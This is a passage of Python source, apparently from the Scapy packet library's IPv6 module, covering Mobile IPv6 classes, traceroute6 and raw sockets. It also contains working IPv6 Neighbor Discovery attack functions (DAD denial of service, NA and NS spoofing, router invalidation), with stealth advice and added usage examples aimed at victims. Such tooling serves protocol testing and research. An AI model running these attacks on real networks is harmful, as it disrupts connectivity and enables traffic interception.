name = "MIPv6 option - Signature"
fields_desc = [ ByteEnumField("otype", 13, _mobopttypes),
FieldLenField("olen", None, length_of="sig", fmt="B"),
StrLenField("sig", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3)
name = "MIPv6 option - Home Keygen Token"
fields_desc = [ ByteEnumField("otype", 14, _mobopttypes),
FieldLenField("olen", None, length_of="hkt", fmt="B"),
StrLenField("hkt", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4)
name = "MIPv6 option - Care-of Test Init"
fields_desc = [ ByteEnumField("otype", 15, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5)
name = "MIPv6 option - Care-of Test"
fields_desc = [ ByteEnumField("otype", 16, _mobopttypes),
FieldLenField("olen", None, length_of="cokt", fmt="B"),
StrLenField("cokt", b'\x00'*8,
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptUnknown(_MIP6OptAlign, Packet):
name = 'Scapy6 - Unknown Mobility Option'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
FieldLenField("olen", None, length_of="odata", fmt="B"),
StrLenField("odata", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
moboptcls = { 0: Pad1,
1: PadN,
2: MIP6OptBRAdvice,
3: MIP6OptAltCoA,
4: MIP6OptNonceIndices,
5: MIP6OptBindingAuthData,
6: MIP6OptMobNetPrefix,
7: MIP6OptLLAddr,
8: MIP6OptMNID,
9: MIP6OptMsgAuth,
10: MIP6OptReplayProtection,
11: MIP6OptCGAParamsReq,
12: MIP6OptCGAParams,
13: MIP6OptSignature,
14: MIP6OptHomeKeygenToken,
15: MIP6OptCareOfTestInit,
16: MIP6OptCareOfTest }
# Main Mobile IPv6 Classes
mhtypes = { 0: 'BRR',
1: 'HoTI',
2: 'CoTI',
3: 'HoT',
4: 'CoT',
5: 'BU',
6: 'BA',
7: 'BE',
8: 'Fast BU',
9: 'Fast BA',
10: 'Fast NA' }
# From http://www.iana.org/assignments/mobility-parameters
bastatus = { 0: 'Binding Update accepted',
1: 'Accepted but prefix discovery necessary',
128: 'Reason unspecified',
129: 'Administratively prohibited',
130: 'Insufficient resources',
131: 'Home registration not supported',
132: 'Not home subnet',
133: 'Not home agent for this mobile node',
134: 'Duplicate Address Detection failed',
135: 'Sequence number out of window',
136: 'Expired home nonce index',
137: 'Expired care-of nonce index',
138: 'Expired nonces',
139: 'Registration type change disallowed',
140: 'Mobile Router Operation not permitted',
141: 'Invalid Prefix',
142: 'Not Authorized for Prefix',
143: 'Forwarding Setup failed (prefixes missing)',
144: 'MIPV6-ID-MISMATCH',
145: 'MIPV6-MESG-ID-REQD',
146: 'MIPV6-AUTH-FAIL',
147: 'Permanent home keygen token unavailable',
148: 'CGA and signature verification failed',
149: 'Permanent home keygen token exists',
150: 'Non-null home nonce index expected' }
class _MobilityHeader(Packet):
name = 'Dummy IPv6 Mobility Header'
overload_fields = { IPv6: { "nh": 135 }}
def post_build(self, p, pay):
p += pay
l = self.len
if self.len is None:
l = (len(p)-8)//8
p = p[:1] + struct.pack("B", l) + p[2:]
if self.cksum is None:
cksum = in6_chksum(135, self.underlayer, p)
else:
cksum = self.cksum
p = chb(p[:4])+struct.pack("!H", cksum)+chb(p[6:])
return p
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
name = "IPv6 Mobility Header - Generic Message"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", None, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrLenField("msg", b"\x00"*2,
length_from = lambda pkt: 8*pkt.len-6) ]
# TODO: make a generic _OptionsField
class _MobilityOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def getfield(self, pkt, s):
l = self.length_from(pkt)
return s[l:],self.m2i(pkt, s[:l])
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
def m2i(self, pkt, x):
opt = []
while x:
o = ord(x[:1]) # Option type (slicing keeps this working on Python 3 bytes)
cls = self.cls
if o in moboptcls:
cls = moboptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = b""
return opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return b"".join(map(str, x))
curpos = self.curpos
s = b""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00'*(d-2)))
pstr = raw(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class MIP6MH_BRR(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Refresh Request"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 0, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("res2", None),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 8,
length_from = lambda pkt: 8*pkt.len) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
# Hack: BRR, BU and BA have the same hashret that returns the same
# value b"\x00\x08\x09" (concatenation of mhtypes). This is
# because we need to match BA with BU and BU with BRR. --arno
return b"\x00\x08\x09"
class MIP6MH_HoTI(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test Init"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 1, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrFixedLenField("reserved", b"\x00"*2, 2),
StrFixedLenField("cookie", b"\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 16,
length_from = lambda pkt: 8*(pkt.len-1)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return bytes(self.cookie)
class MIP6MH_CoTI(MIP6MH_HoTI):
name = "IPv6 Mobility Header - Care-of Test Init"
mhtype = 2
def hashret(self):
return self.cookie
class MIP6MH_HoT(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 3, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("index", None),
StrFixedLenField("cookie", b"\x00"*8, 8),
StrFixedLenField("token", b"\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
def answers(self, other):
if (isinstance(other, MIP6MH_HoTI) and
self.cookie == other.cookie):
return 1
return 0
class MIP6MH_CoT(MIP6MH_HoT):
name = "IPv6 Mobility Header - Care-of Test"
mhtype = 4
def hashret(self):
return self.cookie
def answers(self, other):
if (isinstance(other, MIP6MH_CoTI) and
self.cookie == other.cookie):
return 1
return 0
class LifetimeField(ShortField):
def i2repr(self, pkt, x):
return "%d sec" % (4*x)
class MIP6MH_BU(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Update"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 5, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
XShortField("seq", None), # TODO: ShortNonceField
FlagsField("flags", "KHA", 7, "PRMKLHA"),
XBitField("reserved", 0, 9),
LifetimeField("mhtime", 3), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len - 4) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return b"\x00\x08\x09"
def answers(self, other):
if isinstance(other, MIP6MH_BRR):
return 1
return 0
class MIP6MH_BA(_MobilityHeader):
name = "IPv6 Mobility Header - Binding ACK"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 6, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ByteEnumField("status", 0, bastatus),
FlagsField("flags", "K", 3, "PRK"),
XBitField("res2", None, 5),
XShortField("seq", None), # TODO: ShortNonceField
XShortField("mhtime", 0), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len-4) ]
overload_fields = { IPv6: { "nh": 135 }}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return b"\x00\x08\x09"
def answers(self, other):
if (isinstance(other, MIP6MH_BU) and
other.mhtype == 5 and
self.mhtype == 6 and
other.flags & 0x1 and # Ack request flags is set
self.seq == other.seq):
return 1
return 0
_bestatus = { 1: 'Unknown binding for Home Address destination option',
2: 'Unrecognized MH Type value' }
# TODO: match Binding Error to its stimulus
class MIP6MH_BE(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Error"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 7, mhtypes),
ByteField("res", 0),
XShortField("cksum", None),
ByteEnumField("status", 0, _bestatus),
ByteField("reserved", 0),
IP6Field("ha", "::"),
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 }}
_mip6_mhtype2cls = { 0: MIP6MH_BRR,
1: MIP6MH_HoTI,
2: MIP6MH_CoTI,
3: MIP6MH_HoT,
4: MIP6MH_CoT,
5: MIP6MH_BU,
6: MIP6MH_BA,
7: MIP6MH_BE }
#############################################################################
#############################################################################
### Traceroute6 ###
#############################################################################
#############################################################################
class AS_resolver6(AS_resolver_riswhois):
def _resolve_one(self, ip):
"""
overloaded version to provide a Whois resolution on the
embedded IPv4 address if the address is 6to4 or Teredo.
Otherwise, the native IPv6 address is passed.
"""
if in6_isaddr6to4(ip): # for 6to4, use embedded @
tmp = inet_pton(socket.AF_INET6, ip)
addr = inet_ntop(socket.AF_INET, tmp[2:6])
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
addr = teredoAddrExtractInfo(ip)[2]
else:
addr = ip
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
if asn.startswith(b"AS"):
try:
asn = int(asn[2:])
except ValueError:
pass
return ip,asn,desc
class TracerouteResult6(TracerouteResult):
__slots__ = []
def show(self):
return self.make_table(lambda s_r: (s_r[0].sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 !
s_r[0].hlim,
s_r[1].sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+
"{ICMPv6EchoReply:%ir,type%}")))
def get_trace(self):
trace = {}
for s,r in self.res:
if IPv6 not in s:
continue
d = s[IPv6].dst
if d not in trace:
trace[d] = {}
t = not (ICMPv6TimeExceeded in r or
ICMPv6DestUnreach in r or
ICMPv6PacketTooBig in r or
ICMPv6ParamProblem in r)
trace[d][s[IPv6].hlim] = r[IPv6].src, t
for k in six.itervalues(trace):
try:
m = min(x for x, y in six.iteritems(k) if y[1]) # lowest hlim that reached the target
except ValueError:
continue
for l in list(k): # use list(): k is modified in the loop
if l > m:
del k[l]
return trace
def graph(self, ASres=AS_resolver6(), **kargs):
TracerouteResult.graph(self, ASres=ASres, **kargs)
@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
l4 = None, timeout=2, verbose=None, **kargs):
"""Instant TCP traceroute using IPv6
traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
"""
if verbose is None:
verbose = conf.verb
if l4 is None:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport),
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)
else:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4,
timeout=timeout, verbose=verbose, **kargs)
a = TracerouteResult6(a.res)
if verbose:
a.display()
return a,b
#############################################################################
#############################################################################
### Sockets ###
#############################################################################
#############################################################################
class L3RawSocket6(L3RawSocket):
def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
L3RawSocket.__init__(self, type, filter, iface, promisc)
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
def IPv6inIP(dst='203.178.135.36', src=None):
_IPv6inIP.dst = dst
_IPv6inIP.src = src
if not conf.L3socket == _IPv6inIP:
_IPv6inIP.cls = conf.L3socket
else:
del(conf.L3socket)
return _IPv6inIP
class _IPv6inIP(SuperSocket):
dst = '127.0.0.1'
src = None
cls = None
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
SuperSocket.__init__(self, family, type, proto)
self.worker = self.cls(**args)
def set(self, dst, src=None):
_IPv6inIP.src = src
_IPv6inIP.dst = dst
def nonblock_recv(self):
p = self.worker.nonblock_recv()
return self._recv(p)
def recv(self, x):
p = self.worker.recv(x)
return self._recv(p, x)
def _recv(self, p, x=MTU):
if p is None:
return p
elif isinstance(p, IP):
# TODO: verify checksum
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
if isinstance(p.payload, IPv6):
return p.payload
return p
def send(self, x):
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x)
#############################################################################
#############################################################################
### Neighbor Discovery Protocol Attacks ###
#############################################################################
#############################################################################
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
tgt_filter=None, reply_mac=None):
"""
Internal generic helper accepting a specific callback as first argument,
for NS or NA reply. See the two specific functions below.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
# Get and compare the MAC address
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must be the unspecified address
if req[IPv6].src != "::":
return 0
# Check destination is the link-local solicited-node multicast
# address associated with target address in received NS
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
received_snma = socket.inet_pton(socket.AF_INET6, req[IPv6].dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
return 0
return 1
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, iface),
iface=iface)
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening to incoming NS messages sent from the
unspecified address and sending a NS reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NS sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the unspecified address (::).
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
"""
def ns_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS by sending a similar NS
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt)
sendp(rep, iface=iface, verbose=0)
print("Reply NS for target address %s (received from %s)" % (tgt, mac))
_NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
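# Illustrative usage sketch (not part of the original module; the interface name
# and MAC address below are placeholder values): answer only NS coming from a
# single victim's MAC address.
#
# NDP_Attack_DAD_DoS_via_NS(iface="eth0", mac_src_filter="00:13:72:8c:b5:69")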
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
3756. This is done by listening to incoming NS messages *sent from the
unspecified address* and sending a NA reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address found in received NS.
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
"""
def na_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS with a NA
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst)
rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
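# Illustrative usage sketch (not part of the original module; values are
# placeholders): same DAD DoS, but replying with NA instead of NS.
#
# NDP_Attack_DAD_DoS_via_NA(iface="eth0", reply_mac="00:11:22:33:44:55")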
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None, router=False):
"""
The main purpose of this function is to send fake Neighbor Advertisement
messages to a victim. As the emission of unsolicited Neighbor Advertisement
is pretty pointless (from an attacker standpoint) because it will not
lead to a modification of a victim's neighbor cache, the function send
advertisements in response to received NS (NS sent as part of the DAD,
i.e. with an unspecified address as source, are not considered).
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address
- as IPv6 destination address: the source IPv6 address of received NS
message.
- the mac address of the interface as source (or reply_mac, see below).
- the source mac address of the received NS as destination mac address
of the emitted NA.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
filled with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
router: by the default (False) the 'R' flag in the NA used for the reply
is not set. If the parameter is set to True, the 'R' flag in the
NA is set, advertising us as a router.
Please, keep the following in mind when using the function: for obvious
reasons (kernel space vs. Python speed), when the target of the address
resolution is on the link, the sender of the NS receives 2 NA messages
in a row, the valid one and our fake one. The second one will overwrite
the information provided by the first one, i.e. the natural latency of
Scapy helps here.
In practice, on a common Ethernet link, the emission of the NA from the
genuine target (kernel stack) usually occurs in the same millisecond as
the receipt of the NS. The NA generated by Scapy6 will usually come after
something like 20+ ms. On a usual testbed for instance, this difference is
sufficient to have the first data packet sent from the victim to the
destination before it even receives our fake NA.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must NOT be the unspecified address
if req[IPv6].src == "::":
return 0
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
dst = req[IPv6].dst
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
# If this is a real address resolution NS, then the destination
# address of the packet is the link-local solicited node multicast
# address associated with the target of the NS.
# Otherwise, the NS is a NUD related one, i.e. the peer is
# unicasting the NS to check the target is still alive (L2
# information is still in its cache and it is verified)
received_snma = socket.inet_pton(socket.AF_INET6, dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
print("solicited node multicast @ does not match target @!")
return 0
return 1
def reply_callback(req, reply_mac, router, iface):
"""
Callback that reply to a NS with a spoofed NA
"""
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
# send it back.
mac = req[Ether].src
pkt = req[IPv6]
src = pkt.src
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac, dst=mac)/IPv6(src=tgt, dst=src)
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # target from the NS
# "If the solicitation IP Destination Address is not a multicast
# address, the Target Link-Layer Address option MAY be omitted"
# Given our purpose, we always include it.
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
router = (router and 1) or 0 # Value of the R flags in NA
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, router, iface),
iface=iface)
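# Illustrative usage sketch (not part of the original module; the interface name
# is a placeholder): answer address-resolution NS on the link with spoofed NA,
# additionally advertising ourselves as a router.
#
# NDP_Attack_NA_Spoofing(iface="eth0", router=True)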
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
dst=None, src_mac=None, dst_mac=None, loop=True,
inter=1, iface=None):
"""
The main purpose of this function is to send fake Neighbor Solicitations
messages to a victim, in order to either create a new entry in its neighbor
cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
that a node SHOULD create the entry or update an existing one (if it is not
currently performing DAD for the target of the NS). The entry's reachability
state is set to STALE.
The two main parameters of the function are the source link-layer address
(carried by the Source Link-Layer Address option in the NS) and the
source address of the packet.
Unlike some other NDP_Attack_* functions, this one is not based on a
stimulus/response model. When called, it sends the same NS packet in a loop
every second (the default).
Following arguments can be used to change the format of the packets:
src_lladdr: the MAC address used in the Source Link-Layer Address option
included in the NS packet. This is the address that the peer should
associate in its neighbor cache with the IPv6 source address of the
packet. If None is provided, the mac address of the interface is
used.
src: the IPv6 address used as source of the packet. If None is provided,
an address associated with the emitting interface will be used
(based on the destination address of the packet).
target: the target address of the NS packet. If no value is provided,
a dummy address (2001:db8::1) is used. The value of the target
has a direct impact on the destination address of the packet if it
is not overridden. By default, the solicited-node multicast address
associated with the target is used as destination address of the
packet. Consider specifying a specific destination address if you
intend to use a target address different than the one of the victim.
dst: The destination address of the NS. By default, the solicited node
multicast address associated with the target address (see previous
parameter) is used if no specific value is provided. The victim
is not expected to check the destination address of the packet,
so using a multicast address like ff02::1 should work if you want
the attack to target all hosts on the link. On the contrary, if
you want to be more stealthy, you should provide the target address
for this parameter in order for the packet to be sent only to the
victim.
src_mac: the MAC address used as source of the packet. By default, this
is the address of the interface. If you want to be more stealthy,
feel free to use something else. Note that this address is not the one
that the victim will use to populate its neighbor cache.
dst_mac: The MAC address used as destination address of the packet. If
the IPv6 destination address is multicast (all-nodes, solicited
node, ...), it will be computed. If the destination address is
unicast, a neighbor solicitation will be performed to get the
associated address. If you want the attack to be stealthy, you
can provide the MAC address using this parameter.
loop: By default, this parameter is True, indicating that NS packets
will be sent in loop, separated by 'inter' seconds (see below).
When set to False, a single packet is sent.
inter: When loop parameter is True (the default), this parameter provides
the interval in seconds used for sending NS packets.
iface: to force the sending interface.
"""
if not iface:
iface = conf.iface
# Use provided MAC address as source link-layer address option
# or the MAC address of the interface if none is provided.
if not src_lladdr:
src_lladdr = get_if_hwaddr(iface)
# Prepare packets parameters
ether_params = {}
if src_mac:
ether_params["src"] = src_mac
if dst_mac:
ether_params["dst"] = dst_mac
ipv6_params = {}
if src:
ipv6_params["src"] = src
if dst:
ipv6_params["dst"] = dst
else:
# Compute the solicited-node multicast address
# associated with the target address.
tmp = inet_ntop(socket.AF_INET6,
in6_getnsma(inet_pton(socket.AF_INET6, target)))
ipv6_params["dst"] = tmp
pkt = Ether(**ether_params)
pkt /= IPv6(**ipv6_params)
pkt /= ICMPv6ND_NS(tgt=target)
pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
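# Illustrative usage sketch (not part of the original module; addresses are
# documentation placeholders): make the victim 2001:db8::1 associate
# 2001:db8::f00d with a bogus link-layer address, sending one NS every 2 seconds.
#
# NDP_Attack_NS_Spoofing(src_lladdr="00:11:22:33:44:55", src="2001:db8::f00d",
#                        target="2001:db8::1", dst="2001:db8::1",
#                        inter=2, iface="eth0")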
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
ip_src_filter=None, reply_mac=None,
tgt_mac=None):
"""
The purpose of the function is to monitor incoming RA messages
sent by default routers (RA with a non-zero Router Lifetime values)
and invalidate them by immediately replying with fake RA messages
advertising a zero Router Lifetime value.
The result on receivers is that the router is immediately invalidated,
i.e. the associated entry is discarded from the default router list
and destination cache is updated to reflect the change.
By default, the function considers all RA messages with a non-zero
Router Lifetime value but provides configuration knobs to allow
filtering RA sent by specific routers (Ethernet source address).
With regard to emission, the multicast all-nodes address is used
by default but a specific target can be used, in order for the DoS to
apply only to a specific host.
More precisely, following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RA messages received from this source will trigger replies.
If other default routers advertised their presence on the link,
their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific mac address.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RA messages received from this source address will trigger
replies. If other default routers advertised their presence on the
link, their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific IPv6 source
address.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
tgt_mac: allow limiting the effect of the DoS to a specific host,
by sending the "invalidating RA" only to its mac address.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
# Check if this is an advertisement for a Default Router
# by looking at Router Lifetime value
